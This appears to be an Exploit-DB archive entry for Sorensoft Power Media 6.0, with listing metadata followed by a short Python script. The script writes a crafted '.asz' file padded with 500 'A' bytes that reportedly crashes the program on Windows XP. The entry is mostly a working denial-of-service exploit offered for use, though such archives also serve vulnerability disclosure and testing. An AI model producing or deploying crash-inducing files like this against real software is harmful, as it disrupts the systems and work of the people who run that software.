Sorensoft Power Media 6.0 - Denial of Service
Author: Onying type: dos platform: windows port: date_added: 2012-05-31 date_updated: 2012-05-31 verified: 0 codes: OSVDB-82428 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comPowerMediaSetup7.zip raw file: 18962.py
#!/usr/bin/python # # Exploit Title: Sorensoft Power Media 6.0 (out of memory) # software: Sorensoft power media # version : 6.0 # link: www.sorensoft.com # Author: Onying (@onyiing) # Website: otakku-udang.blogspot.com # Tested on: Windows XP SP3 junk ="\x41"*500 textfile = open("test.asz" , 'w') textfile.write("ASzf Options.dat"+junk) textfile.close()